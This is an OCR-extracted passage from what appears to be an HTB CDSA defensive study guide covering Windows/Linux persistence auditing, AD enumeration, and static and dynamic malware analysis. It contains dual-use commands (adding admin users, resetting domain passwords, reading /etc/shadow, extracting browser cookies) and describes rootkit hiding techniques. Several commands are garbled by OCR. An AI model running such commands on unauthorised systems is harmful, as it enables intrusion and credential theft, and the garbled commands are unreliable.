 Menu\Programs\Startup"
Through wininit
 C:\> type C:\Windows\winstart.bat
 C:\> type %windir%\wininit.ini
 C:\> type %windir%\win.ini
With Sysinternal tools
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat"
You can also export the output to a CSV file
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
With regsitry
 C:\> reg query HKCR\Comfile\Shell\Open\Command
                            45 / 547
                     HTB CDSA
C:\> reg query HKCR\Batfile\Shell\Open\Command
C:\> reg query HKCR\htafile\Shell\Open\Command
C:\> reg query HKCR\Exefile\Shell\Open\Command
C:\> reg query
HKCR\Exefiles\Shell\Open\Command
C:\> reg query HKCR\piffile\shell\open\command
C:\> reg query uHKCU\Control Panel\Desktop"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunOnceEx
                      46 / 547
                     HTB CDSA
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServices
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServicesOnce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Load
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Scripts
C:\> reg query
«HKCU\Software\Microsoft\Windows
NT\CurrentVersion\Windows« /f run
C:\> reg query
«HKCU\Software\Microsoft\Windows
NT\CurrentVersion\Windows« /f load
C:\> reg query
                      47 / 547
                     HTB CDSA
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RecentDocs
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComDlg32\LastVisitedMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComD1g32\0pen5aveMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComDlg32\LastVisitedPidlMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComD1g32\0pen5avePidlMRU /s
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RunMRU
C:\> reg query
«HKCU\Software\Microsoft\Windows\CurrentVersio
                      48 / 547
                     HTB CDSA
n\Explorer\Shell Folders"
C:\> reg query
uHKCU\Software\Microsoft\Windows\CurrentVersio
n\Explorer\User Shell Folders"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Applets\RegEdit /v LastKey
C:\> reg query
"HKCU\Software\Microsoft\InternetExplorer\Type
dURLs"
C:\> reg query
uHKCU\Software\Policies\Microsoft\Windows\Cont
rolPanel \Desktop"
C: \> reg query uHKLM\SOFTWARE\Mic rosoft\Act
iveSetup\Installed Components" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\User Shell Folders"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\Shell Folders"
                      49 / 547
                     HTB CDSA
C:\> reg query
HKLM\Software\Microsoft\Windows\CurrentVersion
\explorer\ShellExecuteHooks
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Browser Helper Objects" /s
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunOnceEx
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServices
C:\> reg query
                      50 / 547
                     HTB CDSA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServicesOnce
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Winlogon\Userinit
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\shellServiceObjectDelayLoad
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows" /f Appinit_DLLs
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon" /f Shell
C: \> reg query "HKLM\SOFTWARE\Mic
rosoft\WindowsNT\CurrentVersion\Winlogon" /f
                      51 / 547
                     HTB CDSA
Userinit
C:\> reg query
HKLM\SOFTWARE\Policies\Microsoft\Windows\Syste
rn\Scripts
C:\> reg query
HKLM\SOFTWARE\Classes\batfile\shell\open\cornr
nand
C:\> reg query
HKLM\SOFTWARE\Classes\cornfile\shell\open\corn
rnand
C:\> reg query
HKLM\SOFTWARE\Classes\exefile\shell\open\comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\htafile\Shell\Open\Comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\piffile\shell\open\comma
nd
C:\> reg query
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\C
urrentVersion\Explorer\Browser Helper Objects"
                      52 / 547
                      HTB CDSA
 /s
 C:\> reg query
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager"
 C:\> reg query
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager\KnownDLLs"
 C:\> reg query
 "HKLM\SYSTEM\ControlSet001\Control\Session
 Manager\KnownDLLs"
Auditing Network Shares
 C:\> net use \\<TARGET IP ADDRESS>
 C:\> net share
 C:\> net session
With wmic
 C:\> wmic volume list brief
 C:\> wmic logicaldisk get
 description,filesystem,name,size
 C:\> wmic share get name,path
                       53 / 547
                              HTB CDSA
Netview Tool
Hosts in current domain
 net view /domain
Hosts in example.com
 net view /domain:example.com
All users in current domain
 net user /domain
Add user
 net user user pass /add
Add user to Administrators
 net localgroup "Administrators" user /add
Show Domain password policy
 net accounts /domain
List local Admins
 net localgroup "Administrators"
List domain groups
                               54 / 547
                           HTB CDSA
 net group /domain
List users in Domain Admins
 net group "Domain Adrnins" /domain
List domain controllers for current domain
 net group "Domain Controllers 11 /domain
Current SMB shares
 net share
Active SMB sessions
 net session I find I "\\"
Unlock domain user account
 net user user /ACTIVE:jes /domain
Change domain user password
 net user user '' newpassword '' /domain
Share folder
 net share share c:\share /GRANT:Everyone,FULL
                              55 / 547
                           HTB CDSA
Auditing AD with PowerView.ps1
Download link
 https://github.com/PowerShellMafia/PowerSploit
 /tree/master/Recon
First we import the modules
 Import-Module powerview.ps1
Retrieve domain controller information
 Get-NetDomainController
Enumerating logged-in users in the current workstation
and the domain controller
 PS C:\Tools\active_directory> Get-NetLoggedon
Get current active sessions on the domain controller
 PS C:\Tools\active_directory> Get-NetSession
Listing Computers
 "Get-NetComputer | select name"
Get users created/modified after a specific date
                            56 / 547
                          HTB CDSA
 Get-ADUser -Filter {((Enabled -eq $True) -and
 (Created -gt "Monday, April 10, 2023 00:00:00
 AM"))} -Property Created, LastLogonDate |
 select SamAccountName, Name, Created | Sort-
 Object Created
Get computers joined to the domain along with date and
other relevant details
 Get-ADComputer -filter * -properties
 whencreated | Select Name,@{n="Owner";e={(Get-
 acl
 "ad:\$($_.distinguishedname)").owner}},whencre
 ated
More cmdlets can be found below
 https://powersploit.readthedocs.io/en/latest/R
 econ/
Linux
Auditing System Information
 # uname -a
 # up time
Auditing Users
                           57 / 547
                           HTB CDSA
View logged in users
Show if a user has ever logged in remotely
 lastl log
 last
View failed logins
 fail log -a
View local user accounts
 cat /etc/passwd
 cat/etc/shadow
View local groups
 cat/etc/group
View sudo access
 cat /etc/sudoers
View accounts with UID 0 (root)
[1]
 # awk -F: '($3 == "0") {p rint}' /etc/passwd
                            58 / 547
                           HTB CDSA
[2]
 # egrep ':0+' /etc/passwd
Bash history for the root user
 # cat /root/.bash_history
File opened by a user
 # lsof -u user-name
Auditing Startups
In Linux, startup and autoruns can be investigated by
viewing the Cron jobs.
List Cron jobs
 crontab -l
List Cron jobs by root and other UID 0 accounts
 crontab -u root -l
Review for unusual Cron jobs
 cat /etc/crontab
 ls /etc/cron,*
Auditing Network Information
                            59 / 547
                               HTB CDSA
View network interfaces
 ifconfig
View network connections
 netstat -antup
 netstat -plantux
View listening ports
 netstat -nap
View network routes
 route
View ARP table
 arp -a
List of processes listening on ports
 lsof -i
Auditing Logs
Auditing authentication logs
 # tail /var/log/auth. log
 # grep -i "fail" /var/log/auth. log
                                60 / 547
                               HTB CDSA
Auditing User login logs in Ubuntu
 tail /var/
Auditing samba activity
 grep -i samba /var/log/syslog
Auditing Cron job logs
 grep -i cron /var/log/syslog
Auditing sudo logs
 grep -i sudo /var/log/auth. log
Filtering 404 logs in Apache
 grep 404 apache-logs.log | grep -v -E
 "favicon. ico I robots. txt"
Auditing files requested in Apache
 head access_log | awk '{print $7}'
View root user command history
 # cat /root/.*history
View last logins
                                61 / 547
                            HTB CDSA
 last
Auditing Applications
List all installed packages along with their versions:
However, it's important to note that this method will only
list applications and programs installed through the
system's package manager. Unfortunately, there is no
surefire way to list manually installed programs and their
components generally, which often requires more manual
file system analysis.
 sudo dpkg -l
The   .viminfo   file stands out as it contains important
information about user interactions within Vim sessions.
The command history stored in           .viminfo   provides a
chronological record of commands executed by users and
can be a valuable resource for reconstructing user
activities.
 find /home/ -°|        f -VaU         ".viminfo"
 2>/dev/null
List out the browser directories within the
workstation's    /home   folder
 sudo find /home -°| d \( -|a+
 "*/.mozilla/firefox" -_ -|a+
 "*/.config/google-chrome" \) 2>/dev/null
                             62 / 547
                            HTB CDSA
The above command can also lead to discovering user
profiles which can be investigated for browsing activity.
Forensic tools like Dumpzilla, for instance, are designed
to parse and extract valuable information from browser
artefacts, providing investigators with a structured
overview of user activity. Dumpzilla can parse data from
various web browsers and allow us to analyse browsing
histories, bookmarks, download logs, and other relevant
artefacts in a streamlined manner.
```bash
sudo python3 dumpzilla.py
/home/motasem/.mozilla/firefox/motasem.default-release
--Summary --Verbosity CRITICAL
 We can also extract cookies:
 ```bash
 sudo python3 dumpzilla.py
 /home/motasem/.mozilla/firefox/motasem.default
 -release --Cookies
Kernel Backdoors
A kernel backdoor is a malicious piece of code (often a
kernel module) loaded into the operating system’s kernel
space. Unlike userland malware, this code has elevated
privileges and can:
     Hide processes, files, or network activity.
     Provide stealthy persistence.
     Create covert channels or unauthorized root access.
                             63 / 547
                             HTB CDSA
In Linux, these are often implemented as Loadable Kernel
Modules (LKMs) with     .ko extension. The attacker loads
them via tools like   insmod , modprobe , or scripts
during system boot.
To discover these module, follow the steps below;
Check Kernel Logs for Suspicious
Modules
Start with   dmesg    to inspect what modules have been
loaded or messages printed by the kernel.
 dmesg | grep -0 spatch
This might show something like:
 [     12.345] Loading sneaky patch module...
Investigate the Kernel Module Itself
Use   modinfo   to gather metadata:
 modinfo spatch.ko
Sample output:
 filename:             /lib/modules/.../spatch.ko
 description:          Sneaky kernel module
 author:               Unknown
 license:              GPL
                              64 / 547
                              HTB CDSA
Then navigate to where the      .ko       file is stored:
 cd /lib/modules/$(uname -)/
 find . -VaU "spatch.ko"
Extract and Analyze with strings
Some IOCs might be embedded directly as an ASCII string or
encoded.
 strings spatch.ko | less
Summary
Technique      Description
Hiding         Hooking functions like readdir() or
processes       getdents() to hide entries in /proc .
Hiding files   Overriding filesystem read operations to
               exclude specific filenames.
Hiding         Manipulating    /proc/net/tcp        or Netfilter
connections    hooks.
Root           Replacing setuid() or exploiting         /proc
escalation     entries to grant root access.
Keylogging     Capturing keystrokes via interrupt handlers or
               input subsystem hooks.
Tools/Functions Often Abused
      kallsyms_lookup_name :              Used to resolve addresses
     of kernel functions not exported normally.
      sys_call_table :       Often hooked to redirect system
                               65 / 547
                             HTB CDSA
     calls.
      init_module()     &   cleanup_module() :    Entry and
     exit points of a kernel module.
AD Enumeration with DSquery
Listing users
 dsquery user -limit 0
Listing Groups
The assumed domain below is          target.com
 dsquery group "cn=users, dc=target, dc=com"
Listing Domain Admins
 dsquery group -name "domain admins" | dsget
 group -members -expand
List groups a user is member of
 dsquery user -name user | dsget user -memberof
 -expand
Getting a user's ID
 dsquery user -name bob | dsget user -samid
List inactive accounts for 3 weeks
                              66 / 547
                           HTB CDSA
 dsquery user -inactive 3
Identification and Detection
Malware Analysis
Creating The Environment
A lab setup for malware analysis requires the ability to
save the state of a machine (snapshot) and revert to that
state whenever required. The machine is thus prepared
with all the required tools installed, and its state is
saved. After analyzing the malware in that machine, it is
restored to its clean state with all the tools installed.
This activity ensures that each malware is analyzed in an
otherwise clean environment, and after analysis, the
machine can be reverted without any sustained damage.
Following these steps ensures that your VM is not
contaminated with remnants of previous malware samples
when analyzing new malware. It also ensures that you
don't have to install your tools again and again for each
analysis.
 1. Create a fresh Virtual Machine with a
 new OS install
 2. Set up the machine by installing all the
 required analysis tools in it
 3. Take a snapshot of the machine
 4. Copy/Download malware samples inside
 the VM and analyze it
                            67 / 547
                           HTB CDSA
 5. Revert the machine to the snapshot after
 the analysis completes
Static Analysis
Definition
Static analysis is marked by analyzing the file without
opening it. In static analysis we aim to extract the below
details
 1-   File extension
 2-   Hash
 3-   IOCs (IPs, domains, hostnames, hashes)
 4-   Useful strings
 5-   Imports and Exports (API Calls)
 6-   sections (.text, .rsrc, .data)
Tools
There are many static analysis tools. The below are the
most popular ones
 1-   winitor (GUI)
 2-   pe-tree (GUI)
 3-   pecheck (non-GUI)
 4-   strings (non-GUI)
 5-   VirusTotal (Online)
 6-   Radare2 (Advanced)
 7-   Ghidra (Advanced)
                            68 / 547
                           HTB CDSA
 8- ProcDoc (GUI)
 9- wxHexEditor
 10-strings
 11- FLOSS
Key PE headers to pay attention to when
analyzing the malware statically
 - IMAGE_IMPORT_DESCRIPTOR
 - IMAGE_NT_HEADERS specifically;
 Signature,File_Header and Optional_Headers
 - IMAGE_SECTION_HEADER. Specifically the
 r.text section
 - SizeOfRawData and Misc_VirtualSize: To
 identify if the binary is packed or
 obfuscated.
 - Entropy: To identify if the binary is packed
 or obfuscated.
Hex and Ascii View of the suspected file
 hexdump -C -n 500 file.exe
 od -x file.exe
 xxd file.exe
Analyzing strings
Non obfuscated binaries
String search is important to uncover artifacts and
indicators of compromise about the malware. The
                            69 / 547
                           HTB CDSA
following information can be extracted by doing a strings
search
 -Windows Functions and APIs, like
 SetWindowsHook, CreateProcess, InternetOpen,
 etc. They provide information about the
 possible functionality of the malware
 - IP Addresses, URLs, or Domains can provide
 information about possible C2 communication.
 The Wannacry malware's killswitch domain was
 found using a string search
 - Miscellaneous strings such as Bitcoin
 addresses, text used for Message Boxes, etc.
 This information helps set the context for
 further malware analysis
Strings can be uncovered using         strings   tool
In Windows
 Strings.exe path-to-binary
In Linux
 strings path-to-binary
Obfuscated binaries
Malware authors use several techniques to obfuscate the
key parts of their code. These techniques often render a
string search ineffective, i.e., we won't find much
information when we search for strings.
To uncover these obfuscated strings, we use             FLOSS   tool
                            70 / 547
                           HTB CDSA
 C:\Users\Administrator\Desktop>floss --no-
 static-strings <path to binary>
More about   FLOSS
 https://www.mandiant.com/resources/blog/automa
 tically-extracting-obfuscated-strings
Extracting File Hash
[1]
 md5sum <file>
[2] with powershell
 Get-FileHash -Path <filename> -Algorithm MD5
Finding The Imphash
The imphash stands for "import hash". Imports are
functions that an executable file imports from other files
or Dynamically Linked Libraries (DLLs). The imphash is a
hash of the function calls/libraries that a malware sample
imports and the order in which these libraries are present
in the sample. This helps identify samples from the same
threat groups or performing similar activities.
Example is below
                            71 / 547
                            HTB CDSA
The above hash then can be taken and looked up in
Malware Bazzare or threat intelligence websites to find
the corresponding malware family that uses such imports
with this hash.
Analyzing The Signature
Signatures are a way to identify if a particular file has a
particular type of content. Its a sequence of bytes in a
file, with or without any context regarding where it is
found. Signatures are used to identify patterns in a file, if
a file is malicious, and identify suspected behavior and
malware family.
The signature can be analyzed using eiher      Yara Rules     or
by using collective anti virus scanning    through Virus
Total
Capa helps identify the capabilities found in a PE file. Capa
reads the files and tries to identify the behavior of the file
based on signatures such as imports, strings, mutexes,
and other artifacts present in the file.
                             72 / 547
                          HTB CDSA
 capa malware-sample
Link to Capa
 https://github.com/mandiant/capa
Analyzing PE Headers
pe-tree
A tool used to dissect and analyze any portable executable
headers
In the right pane here, we see some tree-structure
dropdown menus. The left pane is just shortcuts to the
dropdown menus of the right pane. All of these above
headers are of the data type STRUCT
The IMAGE_DOS_HEADER
The IMAGE_DOS_HEADER consists of the first 64 bytes of
                           73 / 547
                              HTB CDSA
the PE file. When we look at a specific executable using a
hex editor such as wxHexEditor we can highlight the first
64 bytes as the The IMAGE_DOS_HEADER
The MZ characters are an identifier of the Portable
Executable format. When these two bytes are present at
the start of a file, the Windows OS considers it a Portable
Executable format file.
This means that the magic number of a portable
executable file is   0x5a4d   as shown above in the
screenshot. It's reversed in the screenshot due to
endianness.
In pe-tree, the magic number can be found by expanding
IMAGE_DOS_HEADER section and highlighting    e_magic
value.
The DOS_STUB
The DOS STUB contains the message that can also be seen
in any Hex Editor    !This program cannot be run in
                               74 / 547
                            HTB CDSA
DOS mode
The DOS STUB is a small piece of code that only runs if the
PE file is incompatible with the system it is being run on.
IMAGE_NT_HEADERS
This header contains most of the vital information related
to the PE file. The starting address of IMAGE_NT_HEADERS
is found in   e_lfanew   from the IMAGE_DOS_HEADER. In the
redline binary.
                             75 / 547
                            HTB CDSA
NT_HEADERS
The NT_HEADERS consist of the following:
     Signature
     The first 4 bytes of the NT_HEADERS consist of the
     Signature. Usually if the binary is PE, then in any
     text editor you would see          PE   at the byte address of
     the signature.
     FILE_HEADER
     FileHeader has the below fields
     _Machine: This field mentions the type of
     architecture for which the PE file is written.
     NumberOfSections: A PE file contains different
     sections where code, variables, and other resources
     are stored. This field of the IMAGEFILE_HEADER
     mentions the number of sections the PE file has.
     _TimeDateStamp: This field contains the time and
     date of the binary compilation.
     PointerToSymbolTable and NumberOfSymbols: These
     fields are not generally related to PE files. Instead,
     they are here due to the COFF file headers.
     SizeOfOptionalHeader: This field contains the size of
     the optional header.
     Characteristics: This is another critical field. This
     field mentions the different characteristics of a PE
     file.
     OPTIONAL_HEADER
     Important fields that go under this header are:
     Magic: The Magic number tells whether the PE file is
     a 32-bit or 64-bit application. If the value is
      0x010B , it denotes   a 32-bit application; if the
     value is 0x020B , it   represents a 64-bit application.
     AddressOfEntryPoint: This field is significant from a
                             76 / 547
                      HTB CDSA
malware analysis/reverse-engineering point of view.
This is the address from where Windows will begin
execution. In other words, the first instruction to be
executed is present at this address. This is a
Relative Virtual Address (RVA), meaning it is at an
offset relative to the base address of the
image (ImageBase) once loaded into memory.
BaseOfCode and BaseOfData: These are the
addresses of the code and data sections,
respectively, relative to ImageBase.
ImageBase: The ImageBase is the preferred loading
address of the PE file in memory. Generally, the
ImageBase for .exe files is       0x00400000
Subsystem: This represents the Subsystem required
to run the image. The Subsystem can be Windows
Native, GUI (Graphical User Interface), CUI
(Commandline User Interface), or some other
Subsystem.
DataDirectory: The DataDirectory is a structure that
contains import and export information of the PE file
(called Import Address Table and Export Address
Table). This information is handy as it gives a
glimpse of what the PE file might be trying to do.
IMAGE_SECTION_HEADER
Stores information about the data that a PE file
needs to perform its functions, like code, icons,
images, User Interface elements, etc. It contains
the following sections:
.text: The .text section is generally the section that
contains executable code for the application. It
includes   CODE, EXECUTE and READ,        meaning that
this section contains executable code, which can be
read but can't be written to.
                       77 / 547
                            HTB CDSA
      .data: This section contains initialized data of the
      application. It has READ/WRITE permissions but
      doesn't have EXECUTE permissions.
      .rdata/.idata: These sections often contain the
      import information of the PE file. Import information
      helps a PE file import functions from other files or
      Windows API.
      .ndata: The .ndata section contains uninitialized
      data.
      .reloc: This section contains relocation information
      of the PE file.
      .rsrc: The resource section contains icons, images,
      or other resources required for the application UI.
The   .text   contains the below important fields
VirtualAddress: This field indicates this section's Relative
Virtual Address (RVA) in the memory.
VirtualSize: This field indicates the section's size once
loaded into the memory.
SizeOfRawData: This field represents the section size as
stored on the disk before the PE file is loaded in memory.
Characteristics: The characteristics field tells us the
permissions that the section has. For example, if the
section has READ permissions, WRITE permissions or
EXECUTE permissions.
The IMAGE_IMPORT_DESCRIPTOR
The IMAGE_IMPORT_DESCRIPTOR structure contains
information about the different Windows APIs that the PE
file loads when executed to perform its functions.
For example, if a PE file imports CreateFile API, it
indicates that it might create a file when executed.
Dynamic Analysis
                             78 / 547
                           HTB CDSA
Definition
Dynamic analysis is characterized by opening the file in a
sandbox environment and observing its behavior. In
dynamic analysis, we aim to extract the below details
about the sample
 1- Files created and modified by the sample
 2- Network connections
 3- Queried registry keys in addition to
 created and modified ones by the sample.
 4- Processes created.
 5- startup entries created.
Dynamic analysis tools
Dynamic analysis tools are run inside a sandbox which is a
dedicated environment for testing malware. Sandboxes
could be any virtual machine that comes with analysis
tools installed for this purpose. Below are some
sandboxes you can either install them or use their
services online.
Sandboxes
 1-   Cuckoo sandbox (online + virtual machine)
 2-   CAPE sandbox (online + virtual machine)
 3-   Any.run (online)
 4-   Hybrid Analysis (online)
 5-   Intezer (Online)
                            79 / 547
                           HTB CDSA
Analysis tools
The below tools can be installed on a virtual machine if
you want to build one from scratch and equip it with the
below tools used for dynamic analysis
 1-   Process Monitor (GUI)
 2-   Process Hacker (GUI)
 3-   AutoRuns (GUI)
 4-   netstat (command line)
 5-   Wireshark (GUI)
 6-   Tcpdump (command line)
 7-   Crowdstrike
 8-   Process Explorer
Dynamic Analysis with Process Monitor
The controls of ProcMon are self-explanatory, and a brief
description is shown if we hover over one of the controls.
The labels in the screenshot show some of the critical
controls of the data visible below these controls.
   1. Shows the Open and Save options. These options
       are for opening a file that contains ProcMon events
       or saving the events to a supported file.
   2. Shows the Clear option. This option clears all the
      events currently being shown by ProcMon. It is
       good to clear the events once we execute a
       malware sample of interest to reduce noise.
   3. Shows the Filter option, which gives us further
       control over the events shown in the ProcMon
       window.
                            80 / 547
                        HTB CDSA
4. These are toggles to turn off or on Registry,
   FileSystem, Network, Process/Thread, and Profiling
   events.
   If we right-click on the process column on the
   process of our choice, a pop-up menu opens up.
   We can see different options in the pop-up menu.
   Some of these options are related to filtering. For
   example, if we choose the option   Include
   'Explorer.EXE' ,     ProcMon will only show events
   with Process Name Explorer.EXE. If we choose the
   option    Exclude 'Explorer.EXE' ,   it will exclude
   Explorer.EXE from the results. Similarly, we can
   right-click on other columns of the events window
   to filter other options.
                         81 / 547
                    HTB CDSA
ProcMon also allows us to implement advanced
filters. In the menu marked as number 3 in the
first image in this task, we can see the option for
filtering. When we click on this option, we see the
following window pop up.
ProcMon also allows us to view all the existing
processes in a parent-child relationship, forming a
process tree. This can be done by clicking the
 icon in the menu. This option helps identify the
parents and children of different processes. As
                     82 / 547
                           HTB CDSA
       shown by ProcMon, an example process tree can
       be seen below.
Dynamic Analysis with API Logger
The Windows OS isolates the hardware and offers an
Application Programmable Interface (API). A few examples
of APIs include those for creating files, processes,
registries, and files, as well as those for creating and
removing them. Monitoring which APIs a program calls is
thus one technique to spot malware behavior. The names
of the APIs typically go without saying. To learn more
about the APIs, you can turn to the Microsoft
Documentation.
                            83 / 547
                            HTB CDSA
The API Logger is a simple tool that provides basic
information about APIs called by a process.
To open a new process, we can click the highlighted
three-dot menu. When clicked, a file browser allows us to
select the executable for which we want to monitor the
API calls. Once we select the executable, we can click
'Inject & Log' to start the API logging process. We will
see the log of API calls in the lower pane, as seen in the
picture below. In the upper pane, we see the running
processes and their PIDs.
                             84 / 547
                           HTB CDSA
We can see the PID of the process we monitor and the API
called with basic information about the API in the 'msg'
field.
We can click the 'PID' menu for the API logger to log API
calls of a running process. It will open the following
                            85 / 547
                          HTB CDSA
window.
Dynamic Analysis with API Monitor
The API Monitor provides more advanced information about
a process's API calls.
   1. This tab is a filter for the API group we want to
      monitor. For example, we have a group for
      'Graphics and Gaming' related APIs, another for
      'Internet' related APIs and so on. API Monitor will
                           86 / 547
                              HTB CDSA
       only show us APIs from the group we select from
       this menu.
   2. This tab shows the processes being monitored for
       API calls. We can click the 'Monitor New Process'
       option to start monitoring a new process.
   3. This tab shows the API call, the Module, the
      Thread, Time, Return Value, and any errors. We
       can monitor this tab for APIs called by a process.
   4. This tab shows running processes that API Monitor
       can monitor.
   5. This tab shows the Parameters of the API call,
      including the values of those Parameters before and
       after the API calls.
   6. This tab shows the Hex buffer of the selected
       value.
   7. This tab shows the Call Stack of the process.
   8. Finally, this tab shows the Output.
In the below menu, we can select the Process from a
path, any arguments the process takes, the directory
from where we want to start the process, and the method
for attaching API Monitor. We can ignore the 'Arguments'
and 'Start in' options if we don't have any arguments for
the process and want to start it from the path where it is
already located in.
                               87 / 547
                          HTB CDSA
Once we open a process, we see the tabs populate as
seen in the following image
    In Tab 1, we see that we have selected all values so
    that we can monitor all the API calls.
    In Tab 2, we see the path of the process we are
    monitoring.
    In Tab 3, we see a summary of the API calls. The
    highlighted API call can be seen as RegOpenKeyExW.
    Hence we know that the process tried to open a
    registry key. We see that the API call returns an
    error, which we can see in the 'Return Value' field
    of this tab, and the error details can be found in this
    tab's 'Error' field.
                           88 / 547
                           HTB CDSA
     Tab 5 shows the parameters of the API call from
     before and after the API call was made.
     Tab 6 shows the selected value in Hex.
     Tab 7 shows the Call Stack of the process.
Dynamic Analysis with Process Explorer
Another excellent tool from the Sysinternals Suite is
Process Explorer. It might be viewed as a more
sophisticated version of the Windows Task Manager.
Process Explorer is a very effective tool that may be used
to spot masquerading and hollowing strategies used in
processes.
The above screenshot shows all the different processes
running in the system in a tree format. We can also see
their CPU utilization, memory usage, Process IDs (PIDs),
Description, and Company name. We can enable the lower
                            89 / 547
                          HTB CDSA
pane view from the 'View' menu to find more information
about the processes. When enabled, we see the following
screenshot.
When we select a process in the upper pane, we can see
details about that process in the lower pane. Here, we
see the Handles the process has opened for different
Sections, Processes, Threads, Files, Mutexes, and
Semaphores. Handles inform us about the resources being
used in this process. If another process or a thread in
another process is opened by a process, it can indicate
code injection into that process. Similarly, we can see
DLLs and Threads of the process in the other tabs of the
lower pane.
For some more details about a selected process, we can
look at the properties of the process. We can do that by
right-clicking the process name in the process tree and
                           90 / 547
                          HTB CDSA
selecting 'Properties'. When we open the properties of a
process, we see something like the below image.
Process Explorer can help us identify #Process-Hollowing
as well. When we open the 'Strings' tab in a process's
properties, we see something like the below screenshot.
                           91 / 547
                          HTB CDSA
At the bottom of the screenshot, we can see the options
'Image' and 'Memory'. When we select 'Image', Process
Explorer shows us strings present in the disk image of the
process. When 'Memory' is selected, Process Explorer
extracts strings from the process's memory. In normal
circumstances, the strings in the Image of a process will
be similar to those in the Memory as the same process is
                           92 / 547
                           HTB CDSA
loaded in the memory. However, if a    process has been
hollowed, we will see a significant difference between the
strings in the Image and the process's memory. Hence
showing us that the process loaded in the memory is
vastly different from the process stored on the disk.
Dynamic Analysis with Regshot
Regshot is a program that detects alterations to the
registry (or the chosen file system). It can be utilized to
determine whether registry keys were added, removed, or
changed by malware during our dynamic study. In order to
determine the differences between the two snapshots,
Regshot compares the registry before and after the
malware has been executed.
In this simple interface, if we select the Scan dir1 option,
we can also scan for changes to the file system.
After this finishes we take the second shot
                            93 / 547
                          HTB CDSA
Once the second shot finishes, click on compare and this
will open a text file with the changes.
Below we see the Date and time of the shots taken by
Regshot, the computer name, the Username, and the
version of Regshot. Below that, we can see a list of
changes that were made to the registry, starting from
Keys deleted.>
Some malware can check all the running processes and
shut down if any analysis tool is running. When analyzing,
we might often encounter malware samples that check for
                           94 / 547
                           HTB CDSA
ProcExp, ProcMon, or API Monitor before performing any
malicious activity and quitting if these processes are
found. Therefore, these samples might thwart our
analysis efforts. However, since Regshot takes a shot
before and after the execution of the malware sample, it
does not need to be running during malware execution,
making it immune to this technique of detection evasion.
On the flip side, we must ensure that no other process is
running in the background while performing analysis with
Regshot, as there is no filtering mechanism in Regshot, as
we saw in the other tools. Hence, any noise created by
background processes will also be recorded by Regshot,
resulting in False Positives.
Malware Analysis Evasion
Techniques
The below are common techniques used by malware
developers to escape and thawrt both static and dynamic
analysis
Packing and obfuscation
A packer is a tool to obfuscate the data in a PE file so
that it can't be read without unpacking it. In simple
words, packers pack the PE file in a layer of obfuscation
to avoid reverse engineering and render a PE file's static
analysis useless. When the PE file is executed, it runs the
unpacking routine to extract the original code and then
executes it.
You can learn if malware is packed by running "strings" or
"peecheck" you will see that the strings output is often
gibbrish and with pecheck the output will tell you that
                            95 / 547
                            HTB CDSA
sections are packed and contain executable parts.
Higher Entropy represents a higher level of randomness in
data. Random data is generally generated when the
original data is obfuscated, indicating that these values
might indicate a packed executable.
In a packed executable, the     SizeOfRawData will always
be significantly smaller than   the Misc_VirtualSize in
sections with WRITE and EXECUTE permissions. This is
because when the PE file unpacks during execution, it
writes data to this section, increasing its size in the
memory compared to the size on disk, and then executes
it.
The last important indicator of a packed executable we
discuss here is very few Import Function observed under
IMAGE_IMPORT_DESCRIPTOR .                These functions are often
some of the only few imports of a packed PE file because
these functions provide the functionality to unpack the PE
file during runtime
Long sleep calls
The malware will not perform any activity for a long time
after execution. This is often accomplished through long
sleep calls. The purpose of this technique is to time out
the sandbox.
User activity detection
Some malware samples will wait for user activity before
performing malicious activity.This technique is designed to
bypass automated sandbox detection.
Footprinting user activity
                              96 / 547
